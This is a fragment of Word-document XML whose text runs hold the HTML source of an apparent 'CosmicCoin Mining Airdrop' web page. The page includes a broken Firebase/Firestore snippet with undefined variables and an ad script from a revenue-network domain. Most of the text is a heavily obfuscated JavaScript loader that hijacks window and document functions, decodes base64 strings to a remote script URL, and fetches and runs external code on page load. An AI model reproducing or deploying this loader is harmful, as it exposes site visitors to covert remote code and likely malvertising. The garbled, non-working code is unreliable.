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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>!DOCTYPE html&gt;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&lt;html lang="en"&gt;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&lt;meta charset="UTF-8"&gt;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&lt;meta name="google-adsense-account" content="ca-pub-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>5320066196933944</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>"&gt;	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	&lt;script type='text/javascript' src='//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>pl18945766.cpmrevenuegate.com/ae/ad/db/aeaddb9b58f23678550b7763cc0e6d32.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>'&gt;&lt;/script&gt;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	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&lt;title&gt;CosmicCoin Mining Airdrop&lt;/title&gt;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&lt;div id="user-info"&gt;&lt;/div&gt;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&lt;script type="module"&gt;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// Import the functions you need from the SDKs you need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import { initializeApp } from "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://www.gstatic.com/firebasejs/10.12.3/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firebase-app.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>";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import { getAnalytics } from "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://www.gstatic.com/firebasejs/10.12.3/firebase-analytics.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>";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// TODO: Add SDKs for Firebase products that you want to use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// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>https://firebase.google.com/docs/web/setup#available-libraries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// Your web app's Firebase configuration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// For Firebase JS SDK v7.20.0 and later, measurementId is optional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const firebaseConfig =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authDomain: "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>cosmiccoin-galaxy-airdrop.firebaseapp.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>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databaseURL: "gs://cosmiccoin-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>galaxy-airdrop.appspot.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>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projectId: "cosmiccoin-galaxy-airdrop",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storageBucket: "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>cosmiccoin-galaxy-airdrop.appspot.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>",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messagingSenderId: "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>544564103496</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>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appId: "1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>544564103496</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="61"/>
        </w:rPr>
        <w:t>:web:8f866098ec96c9242a8b7d",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measurementId: "G-V2KBXHFY2D"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};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// Initialize Firebase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const app = initializeApp(firebaseConfig);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const analytics = getAnalytics(app);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// Store User Data in Firestore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async function storeUserData(userId, balance)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try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await setDoc(doc(db, "users", userId), { balance: balance });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console.log("User data stored successfully");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} catch (error)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console.error("Error storing user data: ", error);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// Get User Data from Firestore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async function getUserData(userId)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const docRef = doc(db, "users", userId);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const docSnap = await getDoc(docRef);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if (docSnap.exists())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console.log("User data:", docSnap.data());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return docSnap.data();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} else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console.log("No such user data!");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return null;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// Example usage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async function exampleUsage()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console.log('Your User ID:', userId);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// Store balance (update as needed)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await storeUserData(userId, 100); // Set balance to 100 for example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// Get and display user info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const userData = await getUserData(userId);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if (userData)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const userInfoDiv = document.getElementById('user-info');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userInfoDiv.innerHTML = `&lt;p&gt;Your User ID: ${userId}&lt;/p&gt;&lt;p&gt;Your Balance: ${userData.balance}&lt;/p&gt;`;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exampleUsage();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&lt;/script&gt;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&lt;script data-cfasync="false" type="text/javascript"&gt;(function($,document){for($._Ff=$.BD;$._Ff&lt;$.GD;$._Ff+=$.x){switch($._Ff){case $.GE:try{window[$.h];}catch(n){delete window[$.h],window[$.h]=j;}break;case $.DD:window[C]=document,[$.A,$.B,$.C,$.D,$.E,$.F,$.G,$.H,$.I,$.J][$.k](function(n){document[n]=function(){return i[$.w][$.y][n][$.Ch](window[$.y],arguments);};}),[$.a,$.b,$.c][$.k](function(n){Object[$.e](document,n,$.$($.Ci,function(){return window[$.y][n];},$.BF,!$.x));}),document[$.j]=function()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{return arguments[$.BD]=arguments[$.BD][$.CE](new RegExp($.CH,$.CI),C),i[$.w][$.y][$.j][$.CA](window[$.y],arguments[$.BD]);};break;case $.GB:try{window[$.f];}catch(n){delete window[$.f],window[$.f]=b;}break;case $.Cg:var C=$.d+f[$.Bn]()[$.Bw]($.Bz)[$.CB]($.CC);break;case $.Gb:try{window[$.g];}catch(n){delete window[$.g],window[$.g]=z;}break;case $.GJ:try{t=window[$.u];}catch(n){delete window[$.u],window[$.u]=$.$($.CJ,$.$(),$.Cp,function(n,t){return this[$.CJ][n]=k(t);},$.Cr,function(n){return this[$.CJ][$.Ca](n)?this[$.CJ][n]:void $.BD;},$.Cn,function(n){return delete this[$.CJ][n];},$.Cm,function(){return this[$.CJ]=$.$();}),t=window[$.u];}break;case $.CC:i[$.l][$.p]=$.BA,i[$.l][$.q]=$.BB,i[$.l][$.r]=$.BB,i[$.l][$.s]=$.BC,i[$.l][$.t]=$.BD,i[$.i]=$.m,a[$.J]($.z)[$.BD][$.Bt](i),k=i[$.w][$.BE],Object[$.e]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(k,$.n,$.$($.BF,!$.x)),b=i[$.w][$.f],c=i[$.w][$.BG],d=window[$.o],g=i[$.w][[$.Bo,$.Bp,$.Bq,$.Br][$.Bu]($.Bv)],e=i[$.w][$.BH],f=i[$.w][$.BI],h=i[$.w][$.BJ],j=i[$.w][$.h],l=i[$.w][$.Ba],m=i[$.w][$.Bb],n=i[$.w][$.Bc],o=i[$.w][$.Bd],p=i[$.w][$.Be],q=i[$.w][$.Bf],r=i[$.w][$.Bg],s=i[$.w][$.Bh],u=i[$.w][$.Bi],v=i[$.w][$.Bj],x=i[$.w][$.Bk],y=i[$.w][$.Bl],z=i[$.w][$.g],A=i[$.w][$.Bm];break;case $.x:try{i=window[$.y][$.A]($.Bs);}catch(n){for($._D=$.BD;$._D&lt;$.CC;$._D+=$.x){switch($._D){case $.x:B[$.Cc]=$.Ce,i=B[$.Cf];break;case $.BD:var B=(a[$.a]?a[$.a][$.Ck]:a[$.c]||a[$.Co])[$.Cq]();break;}}}break;case $.Gc:!function(r){for($._E=$.BD;$._E&lt;$.Cg;$._E+=$.x){switch($._E){case $.CC:u.m=r,u.c=e,u.d=function(n,t,r){u.o(n,t)||Object[$.e](n,t,$.$($.BF,!$.x,$.Cl,!$.BD,$.Ci,r));},u.n=function(n){for($._C=$.BD;$._C&lt;$.CC;$._C+=$.x)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{switch($._C){case $.x:return u.d(t,$.Cb,t),t;break;case $.BD:var t=n&amp;&amp;n[$.Cd]?function(){return n[$.Cj];}:function(){return n;};break;}}},u.o=function(n,t){return Object[$.CG][$.Ca][$.CA](n,t);},u.p=$.Bv,u(u.s=$.By);break;case $.x:function u(n){for($._B=$.BD;$._B&lt;$.Cg;$._B+=$.x){switch($._B){case $.CC:return r[n][$.CA](t[$.Bx],t,t[$.Bx],u),t.l=!$.BD,t[$.Bx];break;case $.x:var t=e[n]=$.$($.CD,n,$.CF,!$.x,$.Bx,$.$());break;case $.BD:if(e[n])return e[n][$.Bx];break;}}}break;case $.BD:var e=$.$();break;}}}([function(n,t,r){for($._h=$.BD;$._h&lt;$.Cg;$._h+=$.x){switch($._h){case $.CC:t.e=7677130,t.a=7677129,t.v=0,t.w=0,t.h=30,t.y=3,t._=true,t.g=g[$.ar](b('eyJhZGJsb2NrIjp7fSwiZXhjbHVkZXMiOiIifQ==')),t.O=3,t.k='Ly9zdG9vdHNvdS5uZXQvYWN0L2ZpbGVzL250ZmMubWluLmpzP3A9NzY3NzEzMA==',t.S='c3Rvb3Rzb3Uubm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V0',t.A=2,t.P=$.JA*1719914945,t.M='Zez$#t^*EFng',t.T='5ds',t.B='8ftnyblevpc',t.N='oi23uc0s',t.I='hiz',t.C='4sab2sfrxvn',t.z='_yoaith',t.R='_bpriixe',t.D=false;break;case $.x:Object[$.e](t,$.Cd,$.$($.Jf,!$.BD));break;case $.BD:$.Cs;break;}}},function(n,t,r){for($._F=$.BD;$._F&lt;$.Cg;$._F+=$.x){switch($._F){case $.CC:t.F=$.Ig,t.H=$.Ih,t.L=$.Ii,t.G=$.Ij,t.X=$.Ik,t.U=$.BD,t.Y=$.x,t.K=$.CC,t.Z=$.Il;break;case $.x:Object[$.e](t,$.Cd,$.$($.Jf,!$.BD));break;case $.BD:$.Cs;break;}}},function(n,t,u){for($._Dr=$.BD;$._Dr&lt;$.GJ;$._Dr+=$.x){switch($._Dr){case $.Cg:var b=!$.x;break;case $.x:Object[$.e](t,$.Cd,$.$($.Jf,!$.BD)),t[$.Ds]=function(){return $.ao+m.e+$.ci;},t.J=function(){return $.av+m.e;},t.$=function(){return($.BD,h.Q)();},t.V=function(){return[($.BD,o.W)(d.nn[$.EC],d[$.Hb][$.EC]),($.BD,o.W)(d[$.Fl]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<![CDATA[[$.EC],d[$.Hb][$.EC])][$.Bu]($.cr);},t.tn=function(){for($._Bp=$.BD;$._Bp<$.CC;$._Bp+=$.x){switch($._Bp){case $.x:n.id=a.en,window[$.aA](n,$.aq);break;case $.BD:var n=$.$(),t=r(function(){($.BD,w.rn)()&&(v(t),p());},$.at);break;}}},t.un=p,t.in=function(c){return new f[$.Cj](function(t,u){var i=new e()[$.cf](),o=r(function(){for($._Db=$.BD;$._Db<$.CC;$._Db+=$.x){switch($._Db){case $.x:n?(v(o),$.eo===n&&u(new Error($.Df)),b&&(c||($.BD,w[$.EA])(),t(n)),t()):i+l.L<new e()[$.cf]()&&(v(o),u(new Error($.gG)));break;case $.BD:var n=($.BD,h.Q)();break;}}},$.at);});},t.cn=function(){for($._Cp=$.BD;$._Cp<$.CC;$._Cp+=$.x){switch($._Cp){case $.x:if(n)b=!$.BD,($.BD,h.an)(n);else var t=r(function(){($.BD,w.rn)()&&(v(t),p(!$.BD));},$.at);break;case $.BD:var n=($.BD,y.fn)();break;}}};break;case ]]>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<![CDATA[$.DD:function p(t){for($._Dm=$.BD;$._Dm<$.CC;$._Dm+=$.x){switch($._Dm){case $.x:r[$.aF](_.dn,$.Hf+($.BD,w.sn)()),t&&r[$.aG](_.vn,_.ln),r[$.aG](_.wn,s.hn[m.O]),r[$.aa]=function(){if($.bn===r[$.cj]){for($._Dg=$.BD;$._Dg<$.CC;$._Dg+=$.x){switch($._Dg){case $.x:n[$.k](function(n){for($._Bq=$.BD;$._Bq<$.CC;$._Bq+=$.x){switch($._Bq){case $.x:u[r]=e;break;case $.BD:var t=n[$.Hk]($.fG),r=t[$.dj]()[$.fI](),e=t[$.Bu]($.fG);break;}}}),u[_.mn]?(b=!$.BD,($.BD,h.an)(u[_.mn]),t&&($.BD,y.yn)(u[_.mn])):u[_._n]&&($.BD,h.an)(u[_._n]),t||($.BD,h.bn)();break;case $.BD:var n=r[$.eG]()[$.ep]()[$.Hk](new RegExp($.fH,$.Bv)),u=$.$();break;}}}},r[$.Ha]=function(){t&&(b=!$.BD,($.BD,h.an)($.dk));},($.BD,h.pn)(),r[$.aH]();break;case $.BD:var r=new window[$.aw]();break;}}}break;case $.CC:var ]]>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<![CDATA[i,o=u($.Cg),c=u($.GB),f=(i=c)&&i[$.Cd]?i:$.$($.Cj,i),a=u($.DD),d=u($.GC),s=u($.GD),l=u($.x),w=u($.GE),h=u($.GF),m=u($.BD),y=u($.GG),_=u($.GH);break;case $.BD:$.Cs;break;}}},function(n,t,r){for($._Cl=$.BD;$._Cl<$.GJ;$._Cl+=$.x){switch($._Cl){case $.Cg:function a(n){for($._Bx=$.BD;$._Bx<$.CC;$._Bx+=$.x){switch($._Bx){case $.x:return e<=t&&t<=u?t-e:o<=t&&t<=c?t-o+i:$.BD;break;case $.BD:var t=n[$.Bw]()[$.cE]($.BD);break;}}}break;case $.x:Object[$.e](t,$.Cd,$.$($.Jf,!$.BD)),t[$.Dt]=a,t[$.n]=d,t.gn=function(n,u){return n[$.Hk]($.Bv)[$.bJ](function(n,t){for($._Bh=$.BD;$._Bh<$.CC;$._Bh+=$.x){switch($._Bh){case $.x:return d(e);break;case $.BD:var r=(u+$.x)*(t+$.x),e=(a(n)+r)%f;break;}}})[$.Bu]($.Bv);},t.jn=function(n,u){return n[$.Hk]($.Bv)[$.bJ](function(n,t){for($._Bs=$.BD;$._Bs<$.CC;$._Bs+=$.x){switch($._Bs)]]>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{case $.x:return d(e);break;case $.BD:var r=u[t%(u[$.Hc]-$.x)],e=(a(n)+a(r))%f;break;}}})[$.Bu]($.Bv);},t.W=function(n,c){return n[$.Hk]($.Bv)[$.bJ](function(n,t){for($._Bn=$.BD;$._Bn&lt;$.CC;$._Bn+=$.x){switch($._Bn){case $.x:return d(o);break;case $.BD:var r=c[t%(c[$.Hc]-$.x)],e=a(r),u=a(n),i=u-e,o=i&lt;$.BD?i+f:i;break;}}})[$.Bu]($.Bv);};break;case $.DD:function d(n){return n&lt;=$.GE?k[$.n](n+e):n&lt;=$.Gg?k[$.n](n+o-i):k[$.n](e);}break;case $.CC:var e=$.Cu,u=$.Cv,i=u-e+$.x,o=$.Cw,c=$.Cx,f=c-o+$.x+i;break;case $.BD:$.Cs;break;}}},function(t,r,u){for($._Da=$.BD;$._Da&lt;$.GJ;$._Da+=$.x){switch($._Da){case $.Cg:r.Sn=f[$.Bn]()[$.Bw]($.Bz)[$.CB]($.CC),r.kn=f[$.Bn]()[$.Bw]($.Bz)[$.CB]($.CC),r.en=f[$.Bn]()[$.Bw]($.Bz)[$.CB]($.CC),r.On=f[$.Bn]()[$.Bw]($.Bz)[$.CB]($.CC);break;case $.x:Object[$.e](r,$.Cd,$.$($.Jf,!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$.BD)),r.On=r.en=r.kn=r.Sn=r.An=r.xn=void $.BD;break;case $.DD:c&amp;&amp;(c[$.B](a,function t(r){c[$.C](a,t),[($.BD,i.qn)(n[$.Gt]),($.BD,i.Pn)(window[$.cD][$.r]),($.BD,i.En)(new e()),($.BD,i.Mn)(window[$.ct][$.cz]),($.BD,i.Tn)(n[$.dy]||n[$.er])][$.k](function(t){for($._Cu=$.BD;$._Cu&lt;$.CC;$._Cu+=$.x){switch($._Cu){case $.x:q(function(){for($._Cn=$.BD;$._Cn&lt;$.CC;$._Cn+=$.x){switch($._Cn){case $.x:n.id=r[$.bx],n[$.Jf]=t,window[$.aA](n,$.aq),($.BD,o[$.Dv])($.fv+t);break;case $.BD:var n=$.$();break;}}},n);break;case $.BD:var n=m($.Gc*f[$.Bn](),$.Gc);break;}}});}),c[$.B](d,function n(t){for($._Bl=$.BD;$._Bl&lt;$.GJ;$._Bl+=$.x){switch($._Bl){case $.Cg:var e=window[$.ct][$.cz],u=new window[$.aw]();break;case $.x:var r=$.$();break;case $.DD:u[$.aF]($.Iv,e),u[$.aa]=function(){r[$.Di]=u[$.eG](),window[$.aA](r,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$.aq);},u[$.Ha]=function(){r[$.Di]=$.dI,window[$.aA](r,$.aq);},u[$.aH]();break;case $.CC:r.id=t[$.bx];break;case $.BD:c[$.C](d,n);break;}}}));break;case $.CC:var i=u($.GI),o=u($.GJ),c=$.Ct!=typeof document?document[$.a]:null,a=r.xn=$.Do,d=r.An=$.ab;break;case $.BD:$.Cs;break;}}},function(n,t,r){for($._Bo=$.BD;$._Bo&lt;$.Cg;$._Bo+=$.x){switch($._Bo){case $.CC:var e=[];break;case $.x:Object[$.e](t,$.Cd,$.$($.Jf,!$.BD)),t[$.Du]=function(){return e;},t[$.Dv]=function(n){e[$.CB](-$.x)[$.bs]()!==n&amp;&amp;e[$.bg](n);};break;case $.BD:$.Cs;break;}}},function(n,t,r){for($._G=$.BD;$._G&lt;$.Cg;$._G+=$.x){switch($._G){case $.CC:t.Bn=$.Im,t.Nn=$.In,t.vn=$.Io,t.ln=$.Ip,t.In=$.Iq,t.Cn=$.Ir,t.zn=$.Is,t.Rn=$.It,t.Dn=$.Iu,t.dn=$.Iv,t.Fn=$.Iw,t.wn=$.Ix,t.mn=$.Iy,t._n=$.Iz;break;case $.x:Object[$.e](t,$.Cd,$.$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($.Jf,!$.BD));break;case $.BD:$.Cs;break;}}},function(n,t,r){for($._j=$.BD;$._j&lt;$.GJ;$._j+=$.x){switch($._j){case $.Cg:var o=l||i[$.Cj];break;case $.x:Object[$.e](t,$.Cd,$.$($.Jf,!$.BD));break;case $.DD:t[$.Cj]=o;break;case $.CC:var e,u=r($.Ga),i=(e=u)&amp;&amp;e[$.Cd]?e:$.$($.Cj,e);break;case $.BD:$.Cs;break;}}},function(n,t,r){for($._Do=$.BD;$._Do&lt;$.Cg;$._Do+=$.x){switch($._Do){case $.CC:var u=r($.Cg),v=r($.GE),l=r($.BD),f=t.Hn=new j($.bA,$.Bv),i=($.Ct!=typeof document?document:$.$($.a,null))[$.a],w=$.Cy,y=$.Cz,_=$.DA,b=$.DB;break;case $.x:Object[$.e](t,$.Cd,$.$($.Jf,!$.BD)),t.Hn=void $.BD,t.Ln=function(e,u,i){for($._Cc=$.BD;$._Cc&lt;$.CC;$._Cc+=$.x){switch($._Cc){case $.x:return e[$.EC]=o[c],e[$.Hc]=o[$.Hc],function(n)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<![CDATA[{for($._Bz=$.BD;$._Bz<$.CC;$._Bz+=$.x){switch($._Bz){case $.x:if(t===u)for(;r--;)c=(c+=i)>=o[$.Hc]?$.BD:c,e[$.EC]=o[c];break;case $.BD:var t=n&&n[$.bm]&&n[$.bm].id,r=n&&n[$.bm]&&n[$.bm][$.Jf];break;}}};break;case $.BD:var o=e[$.Fm][$.Hk](f)[$.bf](function(n){return!f[$.Je](n);}),c=$.BD;break;}}},t[$.Dw]=function(d,s){return function(n){for($._De=$.BD;$._De<$.CC;$._De+=$.x){switch($._De){case $.x:if(t===s)try{for($._Cx=$.BD;$._Cx<$.CC;$._Cx+=$.x){switch($._Cx){case $.x:d[$.EB]=m(a/l.y,$.Gc)+$.x,d[$.EE]=d[$.EE]?d[$.EE]:new e(i)[$.cf](),d[$.EC]=($.BD,v[$.Dy])(c+l.M);break;case $.BD:var u=d[$.EE]?new e(d[$.EE])[$.Bw]():r[$.Hk](w)[$.dw](function(n){return n[$.fx]($.gA);}),i=u[$.Hk](y)[$.bs](),o=new e(i)[$.eh]()[$.Hk](_),c=o[$.dj](),f=o[$.dj]()[$.Hk](b),a=f[$.dj]();break;}}}catch(n)]]>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<![CDATA[{d[$.EC]=$.dI;}break;case $.BD:var t=n&&n[$.bm]&&n[$.bm].id,r=n&&n[$.bm]&&n[$.bm][$.Di];break;}}};},t.Gn=function(n,t){for($._f=$.BD;$._f<$.CC;$._f+=$.x){switch($._f){case $.x:r[$.bx]=n,i[$.F](r);break;case $.BD:var r=new Event(t);break;}}},t.Xn=function(r,n){return h[$.Ch](null,$.$($.Hc,n))[$.bJ](function(n,t){return($.BD,u.gn)(r,t);})[$.Bu]($.fl);};break;case $.BD:$.Cs;break;}}},function(n,t,u){for($._EC=$.BD;$._EC<$.GE;$._EC+=$.x){switch($._EC){case $.GB:function b(n,t){return n+(m[$.EC]=$.cB*m[$.EC]%$.cx,m[$.EC]%(t-n));}break;case $.Cg:function w(n){for($._CJ=$.BD;$._CJ<$.CC;$._CJ+=$.x){switch($._CJ){case $.x:return h[$.Jz](n);break;case $.BD:if(h[$.Jy](n)){for($._CC=$.BD;$._CC<$.CC;$._CC+=$.x){switch($._CC){case $.x:return r;break;case $.BD:for(var ]]>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<![CDATA[t=$.BD,r=h(n[$.Hc]);t<n[$.Hc];t++)r[t]=n[t];break;}}}break;}}}break;case $.Gb:!function t(){for($._Dv=$.BD;$._Dv<$.GJ;$._Dv+=$.x){switch($._Dv){case $.Cg:var u=r(function(){if($.Bv!==m[$.EC]){for($._Dn=$.BD;$._Dn<$.Cg;$._Dn+=$.x){switch($._Dn){case $.CC:m[$.ED]=!$.BD,m[$.EC]=$.Bv;break;case $.x:try{for($._Dh=$.BD;$._Dh<$.CC;$._Dh+=$.x){switch($._Dh){case $.x:q(function(){if(!_){for($._Ca=$.BD;$._Ca<$.CC;$._Ca+=$.x){switch($._Ca){case $.x:m[$.EE]+=n,t(),($.BD,i.bn)(),($.BD,d.tn)();break;case $.BD:var n=new e()[$.cf]()-y[$.cf]();break;}}}},$.DI);break;case $.BD:if(h(m[$.EB])[$.eq]($.BD)[$.k](function(n){for($._DJ=$.BD;$._DJ<$.Cg;$._DJ+=$.x){switch($._DJ){case $.CC:h(t)[$.eq]($.BD)[$.k](function(n){m[$.Bn]+=k[$.n](b($.Cw,$.Cx));});break;case $.x:var t=b($.Gb,$.GF);break;case ]]>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$.BD:m[$.Bn]=$.Bv;break;}}}),($.BD,a.Un)())return;break;}}}catch(n){}break;case $.BD:if(v(u),window[$.C]($.HJ,n),$.dI===m[$.EC])return void(m[$.ED]=!$.BD);break;}}}},$.at);break;case $.x:y=new e();break;case $.DD:window[$.B]($.HJ,n);break;case $.CC:var n=($.BD,o[$.Dw])(m,c.en);break;case $.BD:m[$.ED]=!$.x;break;}}}();break;case $.GJ:m[$.Bn]=$.Bv,m[$.EB]=$.Bv,m[$.EC]=$.Bv,m[$.ED]=void $.BD,m[$.EE]=null,m[$.EF]=($.BD,s.W)(l.T,l.B);break;case $.CC:var i=u($.GF),o=u($.Gb),c=u($.DD),a=u($.Gc),d=u($.CC),s=u($.Cg),l=u($.BD);break;case $.x:Object[$.e](t,$.Cd,$.$($.Jf,!$.BD)),t[$.Dx]=void $.BD,t[$.Dy]=function(n){return n[$.Hk]($.Bv)[$.cl](function(n,t){return(n&lt;&lt;$.GJ)-n+t[$.cE]($.BD)&amp;$.cx;},$.BD);},t.sn=function(){return[m[$.Bn],m[$.EF]][$.Bu]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($.cr);},t[$.Dz]=function(){for($._Ck=$.BD;$._Ck&lt;$.CC;$._Ck+=$.x){switch($._Ck){case $.x:return[][$.bo](w(h(n)))[$.bJ](function(n){return t[f[$.Bn]()*t[$.Hc]|$.BD];})[$.Bu]($.Bv);break;case $.BD:var t=[][$.bo](w($.cn)),n=$.DD+($.GC*f[$.Bn]()|$.BD);break;}}},t.rn=function(){return m[$.ED];},t[$.EA]=function(){_=!$.BD;};break;case $.GH:var y=new e(),_=!$.x;break;case $.DD:var m=t[$.Dx]=$.$();break;case $.BD:$.Cs;break;}}},function(n,t,r){for($._Dp=$.BD;$._Dp&lt;$.Cg;$._Dp+=$.x){switch($._Dp){case $.CC:var e=r($.Gd),u=r($.GD),i=r($.x),o=r($.BD),c=r($.GJ),f=r($.Ge);break;case $.x:Object[$.e](t,$.Cd,$.$($.Jf,!$.BD)),t[$.EG]=function(n){for($._x=$.BD;$._x&lt;$.CC;$._x+=$.x){switch($._x){case $.x:return d[$.ay]=f,d[$.bh]=a,d;break;case $.BD:var t=document[$.bF],r=document[$.c]||$.$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(),e=window[$.ca]||t[$.cv]||r[$.cv],u=window[$.cb]||t[$.cw]||r[$.cw],i=t[$.cc]||r[$.cc]||$.BD,o=t[$.cd]||r[$.cd]||$.BD,c=n[$.cC](),f=c[$.ay]+(e-i),a=c[$.bh]+(u-o),d=$.$();break;}}},t[$.EH]=function(n){for($._k=$.BD;$._k&lt;$.CC;$._k+=$.x){switch($._k){case $.x:return h[$.CG][$.CB][$.CA](t);break;case $.BD:var t=document[$.E](n);break;}}},t[$.EI]=function n(t,r){for($._l=$.BD;$._l&lt;$.Cg;$._l+=$.x){switch($._l){case $.CC:return n(t[$.Ck],r);break;case $.x:if(t[$.br]===r)return t;break;case $.BD:if(!t)return null;break;}}},t[$.EJ]=function(n){for($._Dk=$.BD;$._Dk&lt;$.DD;$._Dk+=$.x){switch($._Dk){case $.Cg:return!$.x;break;case $.x:for(;n[$.Ck];)r[$.bg](n[$.Ck]),n=n[$.Ck];break;case $.CC:for(var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e=$.BD;e&lt;t[$.Hc];e++)for(var u=$.BD;u&lt;r[$.Hc];u++)if(t[e]===r[u])return!$.BD;break;case $.BD:var t=(o.g[$.de]||$.Bv)[$.Hk]($.Ik)[$.bf](function(n){return n;})[$.bJ](function(n){return[][$.CB][$.CA](document[$.E](n));})[$.cl](function(n,t){return n[$.bo](t);},[]),r=[n];break;}}},t.Yn=function(){for($._Bj=$.BD;$._Bj&lt;$.CC;$._Bj+=$.x){switch($._Bj){case $.x:t.sd=f.Zn,t[$.bi]=c[$.Du],t[$.bj]=o.C,t[$.bk]=o.N,t[$.Fl]=o.I,($.BD,e.Jn)(n,i.F,o.e,o.P,o.a,t);break;case $.BD:var n=$.bp+($.x===o.A?$.db:$.dc)+$.dr+u.Kn[o.O],t=$.$();break;}}},t.$n=function(){for($._BI=$.BD;$._BI&lt;$.CC;$._BI+=$.x){switch($._BI){case $.x:return($.BD,e[$.Eb])(n,o.a)||($.BD,e[$.Eb])(n,o.e);break;case $.BD:var n=u.Qn[o.O];break;}}},t.Un=function(){for($._p=$.BD;$._p&lt;$.CC;$._p+=$.x)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{switch($._p){case $.x:return($.BD,e[$.Eb])(n,o.a);break;case $.BD:var n=u.Qn[o.O];break;}}},t.Vn=function(){return!u.Qn[o.O];},t.Wn=function(){for($._Ct=$.BD;$._Ct&lt;$.Cg;$._Ct+=$.x){switch($._Ct){case $.CC:try{document[$.bF][$.Bt](r),[$.f,$.h,$.g,$.BI][$.k](function(t){try{window[t];}catch(n){delete window[t],window[t]=r[$.w][t];}}),document[$.bF][$.bl](r);}catch(n){}break;case $.x:r[$.l][$.t]=$.BD,r[$.l][$.r]=$.BB,r[$.l][$.q]=$.BB,r[$.i]=$.m;break;case $.BD:var r=document[$.A]($.Bs);break;}}};break;case $.BD:$.Cs;break;}}},function(n,t,r){for($._I=$.BD;$._I&lt;$.GE;$._I+=$.x){switch($._I){case $.GB:var v=t.hn=$.$();break;case $.Cg:var e=t.tt=$.x,u=t.rt=$.CC,i=(t.et=$.Cg,t.ut=$.DD),o=t.it=$.GJ,c=t.ot=$.Cg,f=t.ct=$.GH,a=t.ft=$.GB,d=t.Kn=$.$();break;case $.Gb:v[e]=$.HG,v[u]=$.HH,v[i]=$.HI,v[o]=$.HI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<![CDATA[,v[c]=$.HI;break;case $.GJ:var 